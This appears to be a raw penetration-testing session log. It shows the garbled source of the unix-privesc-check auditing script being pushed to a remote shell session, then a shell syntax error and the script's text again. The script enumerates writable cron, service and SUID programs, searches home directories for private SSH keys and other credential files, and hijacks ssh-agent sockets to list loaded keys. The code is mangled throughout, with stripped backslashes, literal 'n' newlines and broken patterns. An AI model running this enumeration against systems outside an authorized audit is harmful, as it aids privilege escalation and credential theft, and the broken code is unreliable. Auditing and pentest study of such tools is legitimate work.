's/^.*///'`n if [ "$USER" = "*" ]; thenn echo "No user crontabs found in /var/spool/cron/crontabs. Skipping checks."n continuen fin echo "Processing crontab for $USER: $FILE"n if [ -r "$FILE" ]; thenn MYPATH=`grep '^PATH=' "$FILE" | cut -f 2 -d = `n if [ -n "$MYPATH" ]; thenn echo Crontab path is $MYPATHn fin grep -v '^#' "$FILE" | grep -v '^[ t]*$' | grep '[ t][^ t][^ t]*[ t][ t]*' | while read LINEn do n echo "Processing crontab entry: $LINE"n PROG=`echo "$LINE" | awk '{print $6}'`n check_called_programs "$PROG is run via cron as $USER." "$PROG" $USERn donen elsen echo "ERROR: Can't read file $FILE"n fin donenelsen echo "Directory /var/spool/cron/crontabs is not present. Skipping checks."nfinnsection "Checking cron job programs aren't writable (/var/spool/cron/tabs)"nif [ -d "/var/spool/cron/tabs" ]; thenn for FILE in /var/spool/cron/tabs/*; do n USER=`echo "$FILE" | sed 's/^.*///'`n if [ "$USER" = "*" ]; thenn echo "No user crontabs found in /var/spool/cron/crontabs. Skipping checks."n continuen fin echo "Processing crontab for $USER: $FILE"n if [ -r "$FILE" ]; thenn MYPATH=`grep '^PATH=' "$FILE" | cut -f 2 -d = `n if [ -n "$MYPATH" ]; thenn echo Crontab path is $MYPATHn fin grep -v '^#' "$FILE" | grep -v '^[ t]*$' | grep '[ t][^ t][^ t]*[ t][ t]*' | while read LINEn do n echo "Processing crontab entry: $LINE"n PROG=`echo "$LINE" | awk '{print $6}'`n check_called_programs "$PROG is run from cron as $USER." $PROG $USER $MYPATHn donen elsen echo "ERROR: Can't read file $FILE"n fin donenelsen echo "Directory /var/spool/cron/tabs is not present. Skipping checks."nfinn# Check programs run from /etc/inetd.conf have secure permissionsn# TODO: check inetd is actually runningnsection "Checking inetd programs aren't writable"nif [ -f /etc/inetd.conf ] && [ -r /etc/inetd.conf ]; thenn grep -v '^#' /etc/inetd.conf | grep -v '^[ t]*$' | while read LINEn do n USER=`echo $LINE | awk '{print $5}'`n PROG=`echo $LINE | awk '{print $6}'` # could be tcpwappers ...n PROG2=`echo $LINE | awk '{print $7}'` # ... and this is the real progn if [ -z "$PROG" ] || [ "$PROG" = "internal" ]; thenn # Not calling an external programn continuen fin echo Processing inetd line: $LINEn if [ -f "$PROG" ]; thenn check_called_programs "$PROG is run from inetd as $USER." $PROG $USERn fin if [ -f "$PROG2" ]; thenn check_called_programs "$PROG is run from inetd as $USER." $PROG2 $USERn fin donenelsen echo "File /etc/inetd.conf not present. Skipping checks."nfinn# Check programs run from /etc/xinetd.d/*n# TODO: check xinetd is actually runningnsection "Checking xinetd programs aren't writeable"nif [ -d /etc/xinetd.d ]; thenn for FILE in `grep 'disable[ t]*=[ t]*no' /etc/xinetd.d/* | cut -f 1 -d :`; don echo Processing xinetd service file: $FILEn PROG=`grep '^[ t]*server[ t]*=[ t]*' $FILE | sed 's/.*server.*=[ t]*//'`n USER=`grep '^[ t]*user[ t]*=[ t]*' $FILE | sed 's/.*user.*=[ t]*//'`n check_called_programs "$PROG is run from xinetd as $USER." $PROG $USERn donenelsen echo "Directory /etc/xinetd.d not present. Skipping checks."nfinn# Check for writable home directoriesnsection "Checking home directories aren't writable"ncat /etc/passwd | grep -v '^#' | while read LINEndon echo Processing /etc/passwd line: $LINEn USER=`echo $LINE | cut -f 1 -d :`n DIR=`echo $LINE | cut -f 6 -d :`n SHELL=`echo $LINE | cut -f 7 -d :`n if [ "$SHELL" = "/sbin/nologin" ] || [ "$SHELL" = "/bin/false" ]; thenn echo " Skipping user $USER. They don't have a shell."n elsen if [ "$DIR" = "/dev/null" ]; thenn echo " Skipping /dev/null home directory"n elsen check_perms "$DIR is the home directory of $USER." $DIR $USERn fin findonenn# Check for readable files in home directoriesnsection "Checking for readable sensitive files in home directories"ncat /etc/passwd | while read LINEndon USER=`echo $LINE | cut -f 1 -d :`n DIR=`echo $LINE | cut -f 6 -d :`n SHELL=`echo $LINE | cut -f 7 -d :`n for FILE in $HOME_DIR_FILES; don if [ -f "$DIR/$FILE" ]; thenn check_read_perms "$DIR/$FILE is in the home directory of $USER." "$DIR/$FILE" $USER n fin donendonennsection "Checking SUID programs"nif [ "$MODE" = "detailed" ]; thenn for FILE in `find / -type f -perm -04000 2>/dev/null`; don check_called_programs_suid $FILE n donenelsen echo "Skipping checks of SUID programs (it's slow!). Run again in 'detailed' mode."nfinn# Check for private SSH keys in home directoriesnsection "Checking for Private SSH Keys home directories"nfor HOMEDIR in `cut -f 6 -d : /etc/passwd`; do n if [ -d "$HOMEDIR/.ssh" ]; then n PRIV_KEYS=`grep -l 'BEGIN [RD]SA PRIVATE KEY' $HOMEDIR/.ssh/* 2>/dev/null`n if [ -n "$PRIV_KEYS" ]; then n for KEY in $PRIV_KEYS; don ENC_KEY=`grep -l 'ENCRYPTED' "$KEY" 2>/dev/null`n if [ -n "$ENC_KEY" ]; thenn echo "WARNING: Encrypted Private SSH Key Found in $KEY"n elsen echo "WARNING: Unencrypted Private SSH Key Found in $KEY"n fin donen fin fi ndonenn# Check for public SSH keys in home directoriesnsection "Checking for Public SSH Keys home directories"nfor HOMEDIR in `cut -f 6 -d : /etc/passwd`; do n if [ -r "$HOMEDIR/.ssh/authorized_keys" ]; then n KEYS=`grep '^ssh-' $HOMEDIR/.ssh/authorized_keys 2>/dev/null`n if [ -n "$KEYS" ]; then n echo "WARNING: Public SSH Key Found in $HOMEDIR/.ssh/authorized_keys"n fin fi ndonenn# Check for any SSH agents running on the boxnsection "Checking for SSH agents"nAGENTS=`ps -ef | grep ssh-agent | grep -v grep`nif [ -n "$AGENTS" ]; thenn echo "WARNING: There are SSH agents running on this system:"n ps -ef | grep ssh-agent | grep -v grepn # for PID in `ps aux | grep ssh-agent | grep -v grep | awk '{print $2}'`; don for SOCK in `ls /tmp/ssh-*/agent.* 2>/dev/null`; don SSH_AUTH_SOCK=$SOCK; export SSH_AUTH_SOCKn AGENT_KEYS=`ssh-add -l | grep -v 'agent has no identities.' 2>/dev/null`n if [ -n "$AGENT_KEYS" ]; thenn echo "WARNING: SSH Agent has keys loaded [SSH_AUTH_SOCK=$SSH_AUTH_SOCK]"n ssh-add -ln fin donenelsen echo "No SSH agents found"nfinn# Check for any GPG agents running on the boxnsection "Checking for GPG agents"nAGENTS=`ps -ef | grep gpg-agent | grep -v grep`nif [ -n "$AGENTS" ]; thenn echo "WARNING: There are GPG agents running on this system:"n ps aux | grep gpg-agent | grep -v grepnelsen echo "No GPG agents found"nfinn# Check files in /etc/init.d/* can't be modified by non-root usersnsection "Checking startup files (init.d / rc.d) aren't writable"nfor DIR in /etc/init.d /etc/rc.d /usr/local/etc/rc.d; don if [ -d "$DIR" ]; thenn for FILE in $DIR/*; don F=`echo "$FILE" | sed 's/^.*///'`n if [ "$F" = "*" ]; thenn echo "No user startup script found in $DIR. Skipping checks."n continuen fin echo Processing startup script $FILEn check_called_programs "$FILE is run by root at startup." $FILE rootn donen findonennsection "Checking if running programs are writable"nif [ $OS = "solaris" ]; thenn # use the output of ps commandn ps -ef -o user,comm | while read LINEn don USER=`echo "$LINE" | awk '{print $1}'`n PROG=`echo "$LINE" | awk '{print $2}'`n check_called_programs "$PROG is currently running as $USER." "$PROG" "$USER"n donenelif [ $OS = "bsd" ]; thenn # use the output of ps commandn ps aux | while read LINEn don USER=`echo "$LINE" | awk '{print $1}'`n PROG=`echo "$LINE" | awk '{print $11}'`n check_called_programs "$PROG is currently running as $USER." "$PROG" "$USER"n donenelif [ $OS = "hpux" ]; thenn # use the output of ps commandn ps -ef | while read LINEn don USER=`echo "$LINE" | awk '{print $1}'`n PROG1=`echo "$LINE" | awk '{print $8}'`n PROG2=`echo "$LINE" | awk '{print $9}'`n if [ -f "$PROG1" ]; thenn check_called_programs "$PROG is currently running as $USER." "$PROG1" "$USER"n fin if [ -f "$PROG2" ]; thenn check_called_programs "$PROG is currently running as $USER." "$PROG2" "$USER"n fin donenelif [ $OS = "linux" ]; thenn # use the /proc file systemn for PROCDIR in /proc/-9]*; do n unset PROGPATHn PID=`echo $PROCDIR | cut -f 3 -d /`n echo ------------------------n echo "PID: $PID"n if [ -d "$PROCDIR" ]; thenn if [ -r "$PROCDIR/exe" ]; thenn PROGPATH=`ls -l "$PROCDIR/exe" 2>&1 | sed 's/ (deleted)//' | awk '{print $NF}'`n elsen if [ -r "$PROCDIR/cmdline" ]; thenn P=`cat $PROCDIR/cmdline | tr "0" = | cut -f 1 -d = | grep '^/'`n if [ -z "$P" ]; thenn echo "ERROR: Can't find full path of running program: "`cat $PROCDIR/cmdline`n elsen PROGPATH=$Pn fin elsen echo "ERROR: Can't find full path of running program: "`cat $PROCDIR/cmdline`n continuen fin fin get_owner $PROCDIR; OWNER=$GET_OWNER_RETURNn echo "Owner: $OWNER"n elsen echo "ERROR: Can't find OWNER. Process has gone."n continuen fin n if [ -n "$PROGPATH" ]; thenn get_owner $PROGPATH; PROGOWNER=$GET_OWNER_RETURNn echo "Program path: $PROGPATH"n check_called_programs "$PROGPATH is currently running as $OWNER." $PROGPATH $OWNERn finn if [ "$MODE" == "detailed" ]; thenn for FILE in $PROCDIR/fd/*; don F=`echo "$FILE" | sed 's/^.*///'`n if [ "$F" = "*" ]; thenn continuen fin check_perms "$FILE is an open file descriptor for process $PID running as $OWNER." $FILE $OWNERn donen fin donenfin" >script; ./script > log' on shell session 1 (192.168.26.134) sh: line 11: syntax error near unexpected token `(' sh: line 11: `echo -e "#!/bin/shn# unix-privesc-check - Checks Unix system for simple privilege escalationsn# Copyright (C) 2008 pentestmonkey@pentestmonkey.netn#n#n# Licensen# -------n# This tool may be used for legal purposes only. Users take full responsibilityn# for any actions performed using this tool. The author accepts no liabilityn# for damage caused by this tool. If you do not accept these condition thenn# you are prohibited from using this tool.n#n# In all other respects the GPL version 2 applies:n#n# This program is free software; you can redistribute it and/or modifyn# it under the terms of the GNU General Public License version 2 asn# published by the Free Software Foundation.n#n# This program is distributed in the hope that it will be useful,n# but WITHOUT ANY WARRANTY; without even the implied warranty ofn# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See then# GNU General Public License for more details.n#n# You should have received a copy of the GNU General Public License alongn# with this program; if not, write to the Free Software Foundation, Inc.,n# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.n#n# You are encouraged to send comments, improvements or suggestions ton# me at pentestmonkey@pentestmonkey.netn#n#n# Descriptionn# -----------n# Auditing tool to check for weak file permissions and other problems thatn# may allow local attackers to escalate privileges.n# n# It is intended to be run by security auditors and pentetration testers n# against systems they have been engaged to assess, and also by system n# admnisitrators who want to check for "obvious" misconfigurations. It n# can even be run as a cron job so you can check regularly for misconfigurations n# that might be introduced.n#n# Ensure that you have the appropriate legal permission before running itn# someone else's system.n#n# TODO Listn# ---------n# There's still plenty that this script doesn't do...n# - Doesn't work for shell scripts! These appear as "/bin/sh my.sh" in the process listing. n# This script only checks the perms of /bin/sh. Not what we're after. :-(n# - Similarly for perl scripts. Probably python, etc. too.n# - Check /proc/pid/cmdline for absolute path names. Check security of these (e.g. /etc/snmp/snmpd.conf)n# - Check everything in root's path - how to find root's path?n# - /proc/pid/maps, smaps are readable and lists some shared objects. We should check these.n# - /proc/pid/fd contain symlinks to all open files (but you can't see other people FDs)n# - check for trust relationships in /etc/hosts.equivn# - NFS imports / exports / automountern# - Insecure stuff in /etc/fstab (e.g. allowing users to mount file systems)n# - Inspecting people's PATH. tricky. maybe read from /proc/pid/environ, .bashrc, /etc/profile, .bash_profilen# - Check if /etc/init.d/* scripts are readable. Advise user to audit them if they are.n# - .exrc?n# - X11 trusts, apache passwd files, mysql trusts?n# - Daemons configured in an insecure way: tftpd, sadmind, rexdn# - World writable dirs aren't as bad if the sticky bit is set. Check for this before reporting vulns.n# - Maybe do a strings of binaries (and their .so's?)n# - Do a better job of parsing cron lines - search for full pathsn# - Maybe LDPATHs from /etc/env.dn# - Check if ldd, ld.so.conf changes have broken this script on non-linux systems.n# - Avoid check certain paths e.g. /-/_ clearly isn't a real directory.n# - create some sort of readable reportn# - indicate when it's likely a result is a false positive and when it's not.n# - Skip pseudo processes e.g. [usb-storage]n# - File permission on kernel modulesn# - Replace calls to echo with a my_echo func. Should be passed a string and an "importance" value:n# - my_echo 1 "This is important and should always be printed out"n# - my_echo 2 "This is less important and should only be printed in verbose mode"n# - We check some files / dirs multiple times. Slow. Can we implement a cache?n# - grep for PRIVATE KEY to find private ssh and ssl keys. Where to grep?n# - check SGID programsnnVERSION="1.4"nHOME_DIR_FILES=".netrc .ssh/id_rsa .ssh/id_dsa .rhosts .shosts .my.cnf .ssh/authorized_keys .bash_history .sh_history .forward"nCONFIG_FILES="/etc/passwd /etc/group /etc/master.passwd /etc/inittab /etc/inetd.conf /etc/xinetd.con /etc/xinetd.d/* /etc/contab /etc/fstab /etc/profile /etc/sudoers"nPGDIRS="/usr/local/pgsql/data ~postgres/postgresql/data ~postgres/data ~pgsql/data ~pgsql/pgsql/data /var/lib/postgresql/data /etc/postgresql/8.2/main /var/lib/pgsql/data"nnget_owner () {n GET_OWNER_FILE=$1n GET_OWNER_RETURN=`ls -lLd "$GET_OWNER_FILE" | awk '{print $3}'`n}nnget_group () {n GET_GROUP_FILE=$1n GET_GROUP_RETURN=`ls -lLd "$GET_GROUP_FILE" | awk '{print $4}'`n}nnusage () {n echo "unix-privesc-check v$VERSION ( http://pentestmonkey.net/tools/unix-privesc-check )"n echon echo "Usage: unix-privesc-check { standard | detailed }"n echon echo '"standard" mode: Speed-optimised check of lots of security settings.'n echo n echo '"detailed" mode: Same as standard mode, but also checks perms of open file'n echo ' handles and called files (e.g. parsed from shell scripts,'n echo ' linked .so files). This mode is slow and prone to false 'n echo ' positives but might help you find more subtle flaws in 3rd'n echo ' party programs.'n echon echo "This script checks file permissions and other settings that could allow"n echo "local users to escalate privileges."n echo n echo "Use of this script is only permitted on systems which you have been granted" n echo "legal permission to perform a security assessment of. Apart from this "n echo "condition the GPL v2 applies."n echon echo "Search the output for the word 'WARNING'. If you don't see it then this"n echo "script didn't find any problems."n echo n}nnbanner () {n echo "Starting unix-privesc-check v$VERSION ( http://pentestmonkey.net/tools/unix-privesc-check )"n echon echo "This script checks file permissions and other settings that could allow"n echo "local users to escalate privileges."n echo n echo "Use of this script is only permitted on systems which you have been granted" n echo "legal permission to perform a security assessment of. Apart from this "n echo "condition the GPL v2 applies."n echon echo "Search the output below for the word 'WARNING'. If you don't see it then"n echo "this script didn't find any problems."n echo n}nnMODE=$1nnif [ ! "$MODE" = "standard" ] && [ ! "$MODE" = "detailed" ]; thenn usagen exit 0nfinn# Parse any full paths from $1 (config files, progs, dirs).n# Check the permissions on each of these.ncheck_called_programs () {n CCP_MESSAGE_STACK=$1n CCP_FILE=$2n CCP_USER=$3n CCP_PATH=$4 # optionalnn # Check the perms of the supplied file regardlessn # The caller doesn't want to have to call check_perms as well as check_called_programsn check_perms "$CCP_MESSAGE_STACK" "$CCP_FILE" "$CCP_USER" "$CCP_PATH"nn # Skip the slow check if we're in quick moden if [ "$MODE" = "standard" ]; thenn return 0;n finn # Check if file is text or notn IS_TEXT=`file "$CCP_FILE" | grep -i text`n IS_DYNBIN=`file "$CCP_FILE" | grep -i 'dynamically linked'`nn # Process shell scripts (would also work on config files that reference other files)n if [ ! -z "$IS_TEXT" ]; thenn # Parse full paths from file - ignoring commented linesn CALLED_FILES=`grep -v '^#' "$CCP_FILE" | sed -e 's/^[^/]*//' -e 's/["''':}$]/x0a/g' | grep '/' | sed -e 's/[ *].*//' | grep '^/[a-zA-Z0-9_/-]*$' | sort -u`n for CALLED_FILE in $CALLED_FILES; don # echo "$CCP_FILE contains a reference to $CALLED_FILE. Checking perms."n check_perms "$CCP_MESSAGE_STACK $CCP_FILE contains the string $CALLED_FILE." "$CALLED_FILE" "$CCP_USER" "$CCP_PATH"n donen elsen # Process dynamically linked binariesn if [ ! -z "$IS_DYNBIN" ]; thenn n CALLED_FILES=`ldd "$CCP_FILE" 2>/dev/null | grep '/' | sed 's/[^/]*////' | cut -f 1 -d ' '`n for CALLED_FILE in $CALLED_FILES; don check_perms "$CCP_MESSAGE_STACK $CCP_FILE uses the library $CALLED_FILE." "$CALLED_FILE" "$CCP_USER" "$CCP_PATH"n donen n # Strings binary to look for hard-coded config files n # or other programs that might be called.n for CALLED_FILE in `strings "$CCP_FILE" | sed -e 's/^[^/]*//' -e 's/["''':}$]/x0a/g' | grep '/' | sed -e 's/[ *].*//' | grep '^/[a-zA-Z0-9_/-]*$' | sort -u`; don check_perms "$CCP_MESSAGE_STACK $CCP_FILE contains the string $CALLED_FILE." "$CALLED_FILE" "$CCP_USER" "$CCP_PATH"n donen fin fin}nn# Parse any full paths from $1 (config files, progs, dirs).n# Check the permissions on each of these.ncheck_called_programs_suid () {n CCP_FILE=$1n CCP_PATH=$2 # optionalnn get_owner $CCP_FILE; CCP_USER=$GET_OWNER_RETURNn CCP_MESSAGE_STACK="$CCP_FILE is SUID $CCP_USER."n LS=`ls -l $CCP_FILE`n echo "Checking SUID-$CCP_USER program $CCP_FILE: $LS"nn # Don't check perms of executable itselfn # check_perms "$CCP_MESSAGE_STACK" "$CCP_FILE" "$CCP_USER" "$CCP_PATH"nn # Check if file is text or notn IS_TEXT=`file "$CCP_FILE" | grep -i text`n IS_DYNBIN=`file "$CCP_FILE" | grep -i 'dynamically linked'`nn # Process shell scripts (would also work on config files that reference other files)n if [ ! -z "$IS_TEXT" ]; thenn # Skip the slow check if we're in quick moden if [ "$MODE" = "standard" ]; thenn return 0;n finn # Parse full paths from file - ignoring commented linesn CALLED_FILES=`grep -v '^#' "$CCP_FILE" | sed -e 's/^[^/]*//' -e 's/["''':}$]/x0a/g' | grep '/' | sed -e 's/[ *].*//' | grep '^/[a-zA-Z0-9_/-]*$' | sort -u`n for CALLED_FILE in $CALLED_FILES; don # echo "$CCP_FILE contains a reference to $CALLED_FILE. Checking perms."n check_perms "$CCP_MESSAGE_STACK $CCP_FILE contains the string $CALLED_FILE." "$CALLED_FILE" "$CCP_USER" "$CCP_PATH"n donen elsen # Process dynamically linked binariesn if [ ! -z "$IS_DYNBIN" ]; thenn n CALLED_FILES=`ldd "$CCP_FILE" 2>/dev/null | grep '/' | sed 's/[^/]*////' | cut -f 1 -d ' '`n for CALLED_FILE in $CALLED_FILES; don check_perms "$CCP_MESSAGE_STACK $CCP_FILE uses the library $CALLED_FILE." "$CALLED_FILE" "$CCP_USER" "$CCP_PATH"n donen n # Skip the slow check if we're in quick moden if [ "$MODE" = "standard" ]; thenn return 0;n finn # Strings binary to look for hard-coded config files n # or other programs that might be called.n for CALLED_FILE in `strings "$CCP_FILE" | sed -e 's/^[^/]*//' -e 's/["''':}$]/x0a/g' | grep '/' | sed -e 's/[ *].*//' | grep '^/[a-zA-Z0-9_/-]*$' | sort -u`; don check_perms "$CCP_MESSAGE_STACK $CCP_FILE contains the string $CALLED_FILE." "$CALLED_FILE" "$CCP_USER" "$CCP_PATH"n donen fin fin}nn# Check if $1 can be changed by users who are not $2ncheck_perms () {n CP_MESSAGE_STACK=$1n CHECK_PERMS_FILE=$2n CHECK_PERMS_USER=$3n CHECK_PERMS_PATH=$4 # optionalnn if [ ! -f "$CHECK_PERMS_FILE" ] && [ ! -d "$CHECK_PERMS_FILE" ] && [ ! -b "$CHECK_PERMS_FILE" ]; thenn CHECK_PERMS_FOUND=0n if [ ! -z "$CHECK_PERMS_PATH" ]; then n # Look for it in the supplied pathn for DIR in `echo "$CHECK_PERMS_PATH" | sed 's/:/ /g'`; don if [ -f "$DIR/$CHECK_PERMS_FILE" ]; thenn CHECK_PERMS_FOUND=1n CHECK_PERMS_FILE="$DIR/$CHECK_PERMS_FILE"n breakn fin donen fin n #if [ "$CHECK_PERMS_FOUND" = "0" ]; thenn # echo "ERROR: File $CHECK_PERMS_FILE doesn't exist. Checking parent path anyway."n # # return 0n # fin finn C=`echo "$CHECK_PERMS_FILE" | cut -c 1`n if [ ! "$C" = "/" ]; thenn echo "ERROR: Can't find absolute path for $CHECK_PERMS_FILE. Skipping."n return 0n finn echo " Checking if anyone except $CHECK_PERMS_USER can change $CHECK_PERMS_FILE"nn while [ -n "$CHECK_PERMS_FILE" ]; don perms_secure "$CP_MESSAGE_STACK" $CHECK_PERMS_FILE $CHECK_PERMS_USERn CHECK_PERMS_FILE=`echo $CHECK_PERMS_FILE | sed 's//[^/]*$//'`n donen}nn# Check if $1 can be read by users who are not $2ncheck_read_perms () {n CP_MESSAGE_STACK=$1n CHECK_PERMS_FILE=$2n CHECK_PERMS_USER=$3nn if [ ! -f "$CHECK_PERMS_FILE" ] && [ ! -b "$CHECK_PERMS_FILE" ]; thenn echo "ERROR: File $CHECK_PERMS_FILE doesn't exist"n return 0n finn echo " Checking if anyone except $CHECK_PERMS_USER can read file $CHECK_PERMS_FILE"nn perms_secure_read "$CP_MESSAGE_STACK" "$CHECK_PERMS_FILE" "$CHECK_PERMS_USER"n}nnperms_secure_read () {n PS_MESSAGE_STACK=$1n PERMS_SECURE_FILE=$2n PERMS_SECURE_USER=$3nn if [ ! -b "$PERMS_SECURE_FILE" ] && [ ! -f "$PERMS_SECURE_FILE" ] && [ ! -d "$PERMS_SECURE_FILE" ]; thenn echo "ERROR: No such file or directory: $PERMS_SECURE_FILE. Skipping."n return 0n finn # Check if owner is different (but ignore root ownership, that's OK)n only_user_can_read "$PS_MESSAGE_STACK" $PERMS_SECURE_FILE $PERMS_SECURE_USERn n # Check group read perm (but ignore root group, that's OK)n group_can_read "$PS_MESSAGE_STACK" $PERMS_SECURE_FILE $PERMS_SECURE_USERnn # Check world read perm n world_can_read "$PS_MESSAGE_STACK" $PERMS_SECURE_FILEn}nnperms_secure () {n PS_MESSAGE_STACK=$1n PERMS_SECURE_FILE=$2n PERMS_SECURE_USER=$3nn if [ ! -d "$PERMS_SECURE_FILE" ] && [ ! -f "$PERMS_SECURE_FILE" ] && [ ! -b "$PERMS_SECURE_FILE" ]; thenn # echo "ERROR: No such file or directory: $PERMS_SECURE_FILE. Skipping."n return 0n finn # Check if owner is different (but ignore root ownership, that's OK)n only_user_can_write "$PS_MESSAGE_STACK" $PERMS_SECURE_FILE $PERMS_SECURE_USERn n # Check group write perm (but ignore root group, that's OK)n group_can_write "$PS_MESSAGE_STACK" $PERMS_SECURE_FILE $PERMS_SECURE_USERnn # Check world write perm n world_can_write "$PS_MESSAGE_STACK" $PERMS_SECURE_FILEn}nnonly_user_can_write () {n O_MESSAGE_STACK=$1n O_FILE=$2n O_USER=$3nn # We just need to check the owner really as the ownern # can always grant themselves write accessn get_owner $O_FILE; O_FILE_USER=$GET_OWNER_RETURNn if [ ! "$O_USER" = "$O_FILE_USER" ] && [ ! "$O_FILE_USER" = "root" ]; thenn echo "WARNING: $O_MESSAGE_STACK The user $O_FILE_USER can write to $O_FILE"n fin}nngroup_can_write () {n O_MESSAGE_STACK=$1n O_FILE=$2n O_USER=$3 # ignore group write access $3 is only member of groupnn get_group $O_FILE; O_FILE_GROUP=$GET_GROUP_RETURNn P=`ls -lLd $O_FILE | cut -c 6`n if [ "$P" = "w" ] && [ ! "$O_GROUP" = "root" ]; thenn # check the group actually has some members other than $O_USERn group_has_other_members "$O_FILE_GROUP" "$O_USER"; # sets OTHER_MEMBERS to 1 or 0n if [ "$OTHER_MEMBERS" = "1" ]; thenn echo "WARNING: $O_MESSAGE_STACK The group $O_FILE_GROUP can write to $O_FILE"n fin fin}nngroup_has_other_members () {n G_GROUP=$1n G_USER=$2nn # If LDAP/NIS is being used this script can't check group membershipsn # we therefore assume the worst.n if [ "$EXT_AUTH" = 1 ]; thenn OTHER_MEMBERS=1n return 1n finn GROUP_LINE=`grep "^$G_GROUP:" /etc/group`n MEMBERS=`echo "$GROUP_LINE" | cut -f 4 -d : | sed 's/,/ /g'`nn GID=`echo "$GROUP_LINE" | cut -f 3 -d :`n EXTRA_MEMBERS=`grep "^[^:]*:[^:]*:-9]*:$GID:" /etc/passwd | cut -f 1 -d : | xargs echo`nn for M in $MEMBERS; don if [ ! "$M" = "$G_USER" ] && [ ! "$M" = "root" ]; thenn OTHER_MEMBERS=1n return 1n fin donenn for M in $EXTRA_MEMBERS; don if [ ! "$M" = "$G_USER" ] && [ ! "$M" = "root" ]; thenn OTHER_MEMBERS=1n return 1n fin donenn OTHER_MEMBERS=0n return 0n}nnworld_can_write () {n O_MESSAGE_STACK=$1n O_FILE=$2nn P=`ls -lLd $O_FILE | cut -c 9`n S=`ls -lLd $O_FILE | cut -c 10`nn if [ "$P" = "w" ]; thenn if [ "$S" = "t" ]; thenn echo "WARNING: $O_MESSAGE_STACK World write is set for $O_FILE (but sticky bit set)"n elsen echo "WARNING: $O_MESSAGE_STACK World write is set for $O_FILE"n fin fin}nnonly_user_can_read () {n O_MESSAGE_STACK=$1n O_FILE=$2n O_USER=$3nn # We just need to check the owner really as the ownern # can always grant themselves read accessn get_owner $O_FILE; O_FILE_USER=$GET_OWNER_RETURNn if [ ! "$O_USER" = "$O_FILE_USER" ] && [ ! "$O_FILE_USER" = "root" ]; thenn echo "WARNING: $O_MESSAGE_STACK The user $O_FILE_USER can read $O_FILE"n fin}nngroup_can_read () {n O_MESSAGE_STACK=$1n O_FILE=$2n O_USER=$3nn get_group $O_FILE; O_FILE_GROUP=$GET_GROUP_RETURNn P=`ls -lLd $O_FILE | cut -c 5`n if [ "$P" = "r" ] && [ ! "$O_GROUP" = "root" ]; thenn # check the group actually has some members other than $O_USERn group_has_other_members "$O_FILE_GROUP" "$O_USER"; # sets OTHER_MEMBERS to 1 or 0n if [ "$OTHER_MEMBERS" =